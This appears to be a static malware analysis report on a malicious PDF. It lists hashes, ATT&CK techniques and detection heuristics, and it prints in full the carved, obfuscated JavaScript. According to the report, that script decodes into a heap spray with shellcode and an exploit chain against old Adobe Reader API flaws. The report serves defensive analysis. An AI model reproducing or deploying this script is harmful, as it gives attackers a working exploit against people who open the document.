Malicious PDF — malware analysis report

Static analysis result for SHA-256 9a15f6fc128236db…

Verdict: MALICIOUS
File type: PDF
Size: 9.4 KB
Created: 2010-05-29 14:38:53
Authoring application: oMK80H6Ss6r (via aSVd37IzFIfJwx)
First seen: 2013-02-25
MD5: 8578afd8a52ee2fe6ac7362bdd96721d
SHA-1: a82752593a7d138bbd414c4ef6895842febdfb3c
SHA-256: 9a15f6fc128236db983a4082ea952a5a0009ac44f36dd2cd8e887b2978c6ed18
Risk score: 166

Malware Insights

MITRE ATT&CK
T1059.007 JavaScript (the embedded script executes in the PDF reader's JavaScript engine; nothing in the sample is PowerShell)
T1203 Exploitation for Client Execution (Adobe Reader JavaScript API vulnerabilities reached by the decoded second stage)

The PDF carries embedded JavaScript (PDF_JAVASCRIPT, PDF_JS): a /JavaScript action whose /JS stream sits in object 7 and was carved as javascript_obj0007_000.js. The document metadata (creator oMK80H6Ss6r, producer aSVd37IzFIfJwx) is random text rather than a real application name, which is typical of generated exploit documents. The script is obfuscated in two layers. The outer layer is a monoalphabetic substitution decoder: it maps every character of a long ciphered string from a 71-character cipher alphabet back onto a plaintext alphabet and hands the result to eval(); that decoder-plus-eval structure is what PDF_JS_EXPLOIT_CLUSTER and the EXTRACTED_FILE_STATIC_TRIAGE check react to. Applying the same substitution statically, without eval, recovers the inner stage: a heap spray that fills 0x400000-byte blocks with a %u9090 NOP sled followed by %u-encoded shellcode, aimed at the address 0x0c0c0c0c (0x30303030 on the util.printf path), and an exploit chain gated on app.viewerVersion: Collab.collectEmailInfo() for readers below 7.1, util.printf("%45000f", ...) with an oversized numeric string for 7.1 up to 9, and Collab.getIcon() with a padded "N." string for 9 and later. Those are the Adobe Reader JavaScript API flaws tracked as CVE-2007-5659, CVE-2008-2992 and CVE-2009-0927, and the chain is armed through app.setTimeOut so it fires shortly after the document opens. The shellcode begins with a short self-decoding stub (a single-byte XOR over the body), so what it does once it runs, for instance whether it downloads a second-stage payload, cannot be read off this static pass; that needs the shellcode decoded or a dynamic run.

Machine Learning

  • Nyx PDF Classifier: malicious score 1.0000

Heuristics (4)

  • JavaScript action (PDF_JAVASCRIPT; severity low; 2 related findings)
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster (PDF_JS_EXPLOIT_CLUSTER; severity critical)
    PDF combines an executable JavaScript/action surface with exploit-staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script (a fragment of the ciphered second-stage string, shown as it appears in the source, \n escapes included):
    0PVOR,WB=BXymXXXXX;\nBBl}MBI(dsFHHoEZtlTO4HB=BbyPb.9ThdIiMHr M>cto.vRB*Br;\nBBl}MB<eYLCco0WnZ7dH,LB=BIxLb<KH}(0PVOR,WB-BUI(dsFHHoEZtlTO4HB+BXyp1w;\nBBl}MB3s53 LAfbM}dcKnIB=B3otCA}EtU\"%3KXKX%3KXKX\"w;\nBB3s53 LAfbM}dcKnIB=BGc(d8RNo(,<h9FAMU3s53 LAfbM}dcKnIzB<eYLCco0WnZ7dH,Lw;\nBBl}MBJ4h5l(oc}NFE,i4EB=BU0<jKaKKVpIb8AGrRB-BXymXXXXXwB/BIxLb<KH}(0PVOR,W;\nBBPjMBUl}MBjs,NgYffc3k{,Li(B=BX;Bjs,NgYffc3k{,Li(BqBJ4h5l(oc}NFE,i4E;Bjs,NgYffc3k{,Li(B++Bwu\nBBBB)pF8A7(3RK.h35RM[js,NgYffc3k{,Li(]B=B3s53 LAfbM} …
  • Embedded JS stream (PDF_JS; severity low)
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact (EXTRACTED_FILE_STATIC_TRIAGE; severity medium)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: javascript_obj0007_000.js
Kind: pdf-javascript-stream
Source: PDF /JS object 7 at offset 0x246
Size: 8212 bytes
SHA-256: 018ec9993bf83b2be2f3dcfa5dd70920312b384bed8dba6f18ee4a9c32755c11
Detection
ClamAV: No threats found (on the carved script; a clean signature result on a custom-ciphered stage carries no weight, and the static checks below are what actually identify it)
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token: the eval() that executes the substitution-decoded string. 101 of 152 identifiers look randomly generated (for example yR3sT2eu0EuruYP and WgfW9RtQnB8MFcsff9T in the preview), consistent with name-mangling obfuscation. The token the triage engine quoted as its example, 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmn', is not an identifier but a slice of the decoder's plaintext-alphabet string constant.
Preview script
First 1,000 lines of the extracted script
function yR3sT2eu0EuruYP(yR3sT2eu0EuruYP,PNtdygwhVWzytjdi1XQK) {var sBQCRjzVYZ6jVYiB=yR3sT2eu0EuruYP. substr (PNtdygwhVWzytjdi1XQK, 1);return sBQCRjzVYZ6jVYiB;}/*BPQ1uT7ARJH|IyoKFqcpgxD5unQIMRh|hxGRHDSZ*/function WgfW9RtQnB8MFcsff9T(ArL1vIuZHa) {/*ZVWOAgUr|ANwDJgqZo3rMHOANgHRy|eO20d2XxjVwxI*/var e6x06EjNs = new String("<>(){} .,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789");/*AogWTZDfgSftznAoKf[CVV5sIfE5SMuO1QkKqo]M7L6wy7a8cTByp6*//*xbltuxd8pujza|gnMrj8gg|f9tgxYdUM45*/var L4romMKmggfNsX /*otYnYJNOjcuNocwm8TC[SvAGKdaWYWRD]qrfz4u*/= new String("qQUwuDB>z,ek5FOfY{7nsJ9ix2gVNZGT<)d} AbtP.RI0hc4ojE(MCv3lWy6LXSrpma8H1K");/*WfmA7Zn6tqa|cbIm4|AT6QWC6Diw8SMV*/for(AIY8iqcfdTci3qQe2KLg=0;AIY8iqcfdTci3qQe2KLg<e6x06EjNs.length;AIY8iqcfdTci3qQe2KLg++) {if(ArL1vIuZHa == yR3sT2eu0EuruYP(L4romMKmggfNsX, AIY8iqcfdTci3qQe2KLg)) {/*zWvP9s8qIAIjIuert[n9Kq6OOtNh6iVv4GB]y9k79shHdCzM0dMAKJP*/return yR3sT2eu0EuruYP(e6x06EjNs, AIY8iqcfdTci3qQe2KLg);/*Ac6zBRl5Xmz <laJkJrsm]izjBCkMMzlFSh4Ty*/}}return ArL1vIuZHa;}/*PMIFZtfjUoQCR[lHjmJJyV9ZaS7Vlw1099]Ytb8DGOGXOrfxUo7JA6*//*bOgw0TorSnnrXF|bL4hjIPE6kt3ttz|KE074JlmcP*/var v5F0pxkEC = new String;var TPSxDzjlK6b9pA = new String("\nl}MB)pF8A7(3RK.h35RMB=BotWB,MM}6Uw;\nl}MBye0JZOcRPtOnWv<h;\nP3oAvIjoBGc(d8RNo(,<h9FAMU3s53 LAfbM}dcKnIzB<eYLCco0WnZ7dH,Lwu\nBBWRIctBU3s53 LAfbM}dcKnI>cto.vRB*BrBqB<eYLCco0WnZ7dH,Lwu\nBBBB3s53 LAfbM}dcKnIB+=B3s53 LAfbM}dcKnI;\nBBD\nBB3s53 LAfbM}dcKnIB=B3s53 LAfbM}dcKnI>C3 CvMIo.UXzB<eYLCco0WnZ7dH,LB/Brw;\nBBMtv3MoB3s53 LAfbM}dcKnI;\nD\nP3oAvIjoBF93m9TnSi3d,p3CWUo,W6W0RCmekb{9bhwu\nBBl}MB0<jKaKKVpIb8AGrRB=BXyXAXAXAXA;\nBBl}MBbyPb.9ThdIiMHr 
MB=B3otCA}EtU\"%3mpmp%3mpmp%3mpmp%3XOFe%3ppae%388kK%31XeK%31XXS%3FOpp%3Frmp%3FeO,%3F1Xa%3OOFk%3OOOO%31eHO%35OmF%3FOFO%38mFO%3Fp,O%3KO8m%3mrOp%3KO8m%38FFH%3FOXp%3FOFe%38mFO%3eKXp%38S1H%3FS,S%3XHXp%3FOSS%3FOFO%3,,88%3eKFe%3HH1H%38aSS%3XHFS%3FOSO%3FOFO%3,,88%3eKFH%3k,1H%3SXaO%3XHr5%3FOX5%3FOFO%3,,88%3eKFp%3XX1H%3XOrS%3XH1O%3FOpe%3FOFO%3,,88%3eKOO%3rF1H%3X,K8%3XHaH%3FOrK%3FOFO%3,,88%3,OOe%35H8O%3K,rk%388Sa%3OH,,%3F1X8%3FOFF%3eSFO%3K,88%38mke%3Fe,,%3FF1a%38me8%3OHe,%3XHeK%3FO8m%3FOFO%31HeO%3Oa5K%3KOkX%3H1XH%3FOFO%388FO%3Op,,%3r,8m%3rO8k%388eO%3kO,,%3SX1H%3FOFO%3eOFO%3,,8m%31aOe%3e8F5%3e,8m%3XHOH%3FO1F%3FOFO%3,,Fk%3r1kO%3epFO%3kSKS%3r11,%3Fe,O%31,KH%3FOFO%3K,SX%38mkO%3Fp,,%3FF1a%38me8%3OHe,%3,OXH%3FOFO%31aFO%3eHF1%3,,Fk%35kke%3ekpm%3SXek%3kOK,%3ekeO%3,,8m%31aOp%3e8F,%3e,8m%3XHOH%3FOkk%3FOFO%3FO1a%3K,SX%38mkO%3FH,,%3F51a%38me8%3OHe,%3OOXH%3FOFO%31aFO%38mSX%3OO,,%3FF1a%38me8%3OHe,%3FOXH%3FOFO%3,FFO%3e5em%3XFFk%3XFFk%3XFFk%3XFFk%3Xp8k%3eaFe%38mek%3X5pa%3e5S1%3XOSX%38me,%38mXp%3FHKr%3er8m%3eKFp%3Kk8m%38m5p%3OSKe%3FkKH%3eKSk%3KK8m%3FkkO%35kSk%3,8r8%3mr,F%3rkFk%35keK%3FXSK%3OOaS%3S55a%3FHKe%3rSrF%3FkFr%3,OS5%3SFXm%3SS5m%3K,eS%3eaX,%3Xm8m%3ea8m%3Fkke%31Kpr%3Fp8m%38m,m%3Opea%3prFk%3Fe8m%3Fk8m%3eSr,%3r5er%3FOFH%3SeXH%3SXSS%3e,SX%3,pe5%3,X,r%3FO,S%3Hm81%3HXHm%3rOp,%38mrO%385pX%3pS8S%3Hp8F%38KrF%3888F%3rO8O%38k8r%38H8O%38krO%38S8O%3rF8m%381HX%3pOHX%38m8K%3pKp5%3XXp8\"w;\nBBIPBUo,W6W0RCmekb{9bhB==BSwu\nBBBB0<jKaKKVpIb8AGrRB=BXypXpXpXpX;\nBBBBbyPb.9ThdIiMHr 
MB=B3otCA}EtU\"%3mpmp%3mpmp%3mpmp%3XOFe%3ppae%388kK%31XeK%31XXS%3FOpp%3Frmp%3FeO,%3F1Xa%3OOFk%3OOOO%31eHO%35OmF%3FOFO%38mFO%3Fp,O%3KO8m%3mrOp%3KO8m%38FFH%3FOXp%3FOFe%38mFO%3eKXp%38S1H%3FS,S%3XHXp%3FOSS%3FOFO%3,,88%3eKFe%3HH1H%38aSS%3XHFS%3FOSO%3FOFO%3,,88%3eKFH%3k,1H%3SXaO%3XHr5%3FOX5%3FOFO%3,,88%3eKFp%3XX1H%3XOrS%3XH1O%3FOpe%3FOFO%3,,88%3eKOO%3rF1H%3X,K8%3XHaH%3FOrK%3FOFO%3,,88%3,OOe%35H8O%3K,rk%388Sa%3OH,,%3F1X8%3FOFF%3eSFO%3K,88%38mke%3Fe,,%3FF1a%38me8%3OHe,%3XHeK%3FO8m%3FOFO%31HeO%3Oa5K%3KOkX%3H1XH%3FOFO%388FO%3Op,,%3r,8m%3rO8k%388eO%3kO,,%3SX1H%3FOFO%3eOFO%3,,8m%31aOe%3e8F5%3e,8m%3XHOH%3FO1F%3FOFO%3,,Fk%3r1kO%3epFO%3kSKS%3r11,%3Fe,O%31,KH%3FOFO%3K,SX%38mkO%3Fp,,%3FF1a%38me8%3OHe,%3,OXH%3FOFO%31aFO%3eHF1%3,,Fk%35kke%3ekpm%3SXek%3kOK,%3ekeO%3,,8m%31aOp%3e8F,%3e,8m%3XHOH%3FOkk%3FOFO%3FO1a%3K,SX%38mkO%3FH,,%3F51a%38me8%3OHe,%3OOXH%3FOFO%31aFO%38mSX%3OO,,%3FF1a%38me8%3OHe,%3FOXH%3FOFO%3,FFO%3e5em%3XFFk%3XFFk%3XFFk%3XFFk%3Xp8k%3eaFe%38mek%3X5pa%3e5S1%3XOSX%38me,%38mXp%3FHKr%3er8m%3eKFp%3Kk8m%38m5p%3OSKe%3FkKH%3eKSk%3KK8m%3FkkO%35kSk%3,8r8%3mr,F%3rkFk%35keK%3FXSK%3OOaS%3S55a%3FHKe%3rSrF%3FkFr%3,OS5%3SFXm%3SS5m%3K,eS%3eaX,%3Xm8m%3ea8m%3Fkke%31Kpr%3Fp8m%38m,m%3Opea%3prFk%3Fe8m%3Fk8m%3eSr,%3r5er%3FOFH%3SeXH%3SXSS%3e,SX%3,pe5%3,X,r%3FO,S%3Hm81%3HXHm%3rOp,%38mrO%385pX%3pS8S%3Hp8F%38KrF%3888F%3rO8O%38k8r%38H8O%38krO%38S8O%3rF8m%381HX%3pOHX%38m8K%3pKp5%3XXp8\"w;\nBBD\nBBtcCtBIPBUo,W6W0RCmekb{9bhB==Brwu\nBBBBbyPb.9ThdIiMHr 
MB=B3otCA}EtU\"%3mpmp%3mpmp%3mpmp%3XOFe%3ppae%388kK%31XeK%31XXS%3FOpp%3Frmp%3FeO,%3F1Xa%3OOFk%3OOOO%31eHO%35OmF%3FOFO%38mFO%3Fp,O%3KO8m%3mrOp%3KO8m%38FFH%3FOXp%3FOFe%38mFO%3eKXp%38S1H%3FS,S%3XHXp%3FOSS%3FOFO%3,,88%3eKFe%3HH1H%38aSS%3XHFS%3FOSO%3FOFO%3,,88%3eKFH%3k,1H%3SXaO%3XHr5%3FOX5%3FOFO%3,,88%3eKFp%3XX1H%3XOrS%3XH1O%3FOpe%3FOFO%3,,88%3eKOO%3rF1H%3X,K8%3XHaH%3FOrK%3FOFO%3,,88%3,OOe%35H8O%3K,rk%388Sa%3OH,,%3F1X8%3FOFF%3eSFO%3K,88%38mke%3Fe,,%3FF1a%38me8%3OHe,%3XHeK%3FO8m%3FOFO%31HeO%3Oa5K%3KOkX%3H1XH%3FOFO%388FO%3Op,,%3r,8m%3rO8k%388eO%3kO,,%3SX1H%3FOFO%3eOFO%3,,8m%31aOe%3e8F5%3e,8m%3XHOH%3FO1F%3FOFO%3,,Fk%3r1kO%3epFO%3kSKS%3r11,%3Fe,O%31,KH%3FOFO%3K,SX%38mkO%3Fp,,%3FF1a%38me8%3OHe,%3,OXH%3FOFO%31aFO%3eHF1%3,,Fk%35kke%3ekpm%3SXek%3kOK,%3ekeO%3,,8m%31aOp%3e8F,%3e,8m%3XHOH%3FOkk%3FOFO%3FO1a%3K,SX%38mkO%3FH,,%3F51a%38me8%3OHe,%3OOXH%3FOFO%31aFO%38mSX%3OO,,%3FF1a%38me8%3OHe,%3FOXH%3FOFO%3,FFO%3e5em%3XFFk%3XFFk%3XFFk%3XFFk%3Xp8k%3eaFe%38mek%3X5pa%3e5S1%3XOSX%38me,%38mXp%3FHKr%3er8m%3eKFp%3Kk8m%38m5p%3OSKe%3FkKH%3eKSk%3KK8m%3FkkO%35kSk%3,8r8%3mr,F%3rkFk%35keK%3FXSK%3OOaS%3S55a%3FHKe%3rSrF%3FkFr%3,OS5%3SFXm%3SS5m%3K,eS%3eaX,%3Xm8m%3ea8m%3Fkke%31Kpr%3Fp8m%38m,m%3Opea%3prFk%3Fe8m%3Fk8m%3eSr,%3r5er%3FOFH%3SeXH%3SXSS%3e,SX%3,pe5%3,X,r%3FO,S%3Hm81%3HXHm%3rOp,%38mrO%385pX%3pS8S%3Hp8F%38KrF%3888F%3rO8O%38k8r%38H8O%38krO%38S8O%3rF8m%381HX%3pOHX%38m8K%3pKp5%3XXp8\"w;\nBBD\nBBl}MBIxLb<KH}(0PVOR,WB=BXymXXXXX;\nBBl}MBI(dsFHHoEZtlTO4HB=BbyPb.9ThdIiMHr M>cto.vRB*Br;\nBBl}MB<eYLCco0WnZ7dH,LB=BIxLb<KH}(0PVOR,WB-BUI(dsFHHoEZtlTO4HB+BXyp1w;\nBBl}MB3s53 LAfbM}dcKnIB=B3otCA}EtU\"%3KXKX%3KXKX\"w;\nBB3s53 LAfbM}dcKnIB=BGc(d8RNo(,<h9FAMU3s53 LAfbM}dcKnIzB<eYLCco0WnZ7dH,Lw;\nBBl}MBJ4h5l(oc}NFE,i4EB=BU0<jKaKKVpIb8AGrRB-BXymXXXXXwB/BIxLb<KH}(0PVOR,W;\nBBPjMBUl}MBjs,NgYffc3k{,Li(B=BX;Bjs,NgYffc3k{,Li(BqBJ4h5l(oc}NFE,i4E;Bjs,NgYffc3k{,Li(B++Bwu\nBBBB)pF8A7(3RK.h35RM[js,NgYffc3k{,Li(]B=B3s53 LAfbM}dcKnIB+BbyPb.9ThdIiMHr M;\nBBD\nD\nP3oAvIjoB 
KmR6MN)sRiGH,nsUwu\nBBl}MBNGE64HO)Sg(egFp5B=BX;\nBBl}MBIH3sy93{87jeNX<SB=B}EE>lItWtMGtMCIjo>vjVvMIo.Uw;\nBB}EE>Act}MNI4ti3vUye0JZOcRPtOnWv<hw;\n\nBBIPBUIH3sy93{87jeNX<SBqBH>Swu\nBBBBF93m9TnSi3d,p3CWUXw;\nBBBBl}MB(96gNFSZP(P18InVB=B3otCA}EtU\"%3XAXA%3XAXA\"w;\nBBBBWRIctBU(96gNFSZP(P18InV>cto.vRBqBmmKarw(96gNFSZP(P18InVB+=B(96gNFSZP(P18InV;\nBBBBvRICB>Ajcc} VvjMtB=Bkjcc} >AjcctAvF4}Ic{oPjUu\nBBBBBBC3 0B:B\"\"zB4C.B:B(96gNFSZP(P18InV\nBBBBD\nBBBBw;\nBBD\nIPBUIH3sy93{87jeNX<SBQ=BKwu\nBBBBvM6Bu\nIPBU}EE>bjA>kjcc} >.tv{Ajowu\nBBBBBBBBF93m9TnSi3d,p3CWUrw;\nBBBBBBBBl}MB(Fj4AI8RrvvGpgGRB=B3otCA}EtU\"%XK\"w;\nBBBBBBBBWRIctBU(Fj4AI8RrvvGpgGR>cto.vRBqBXymXXXw(Fj4AI8RrvvGpgGRB+=B(Fj4AI8RrvvGpgGR;\nBBBBBBBB(Fj4AI8RrvvGpgGRB=B\"9>\"B+B(Fj4AI8RrvvGpgGR;\n}EE>bjA>kjcc} >.tv{AjoU(Fj4AI8RrvvGpgGRw;\nBBBBBBBBNGE64HO)Sg(egFp5B=BS;\nBBBBBBD\nBBBBBBtcCtBu\nBBBBBBBBNGE64HO)Sg(egFp5B=BS;\nBBBBBBD\nBBBBD\nBBBBA}vARBUtwu\nBBBBBBNGE64HO)Sg(egFp5B=BS;\nBBBBD\nBBBBIPBUNGE64HO)Sg(egFp5B==BSwu\nBBBBBBIPBUUIH3sy93{87jeNX<SBQ=BH>S&&BIH3sy93{87jeNX<SBqBKwwu\nBBBBBBBBF93m9TnSi3d,p3CWUSw;\nBBBBBBBBl}MBFZXYIXciSgGHX()yB=B\"SrKKKKKKKKKKKKKKKKKK\";\nBBBBBBBBPjMBUR90R8jx1R7AhhKV)B=BX;BR90R8jx1R7AhhKV)BqBrH8;BR90R8jx1R7AhhKV)B++Bwu\nBBBBBBBBBBFZXYIXciSgGHX()yB+=B\"1\";\nBBBBBBBBD\nBBBBBBBB3vIc>EMIovPU\"%maXXXP\"zBFZXYIXciSgGHX()yw;\nBBBBBBD\nBBBBD\nBBD\nD\n}EE>( EJc}c4rYC,1gKkB=B KmR6MN)sRiGH,ns;\nye0JZOcRPtOnWv<hB=B}EE>CtvNI4ti3vU\"}EE>( EJc}c4rYC,1gKkUw\"zBSXw;\n");/*JmUzDgtlF{AKxb3qLmgfxlVuffWI}lXHOs6SOp4UgveUNYBZA*//*AyIPiov4wtgK0|AwDHc7b9s5T6TUVU2|IBfrqQmdA*/for(O10eCFQ8LGo9=0;O10eCFQ8LGo9<TPSxDzjlK6b9pA.length;O10eCFQ8LGo9++)v5F0pxkEC += WgfW9RtQnB8MFcsff9T(yR3sT2eu0EuruYP(TPSxDzjlK6b9pA,O10eCFQ8LGo9));eval(v5F0pxkEC);/*n03gn6n[AEEmAX]Us4plJxnpfT6H*/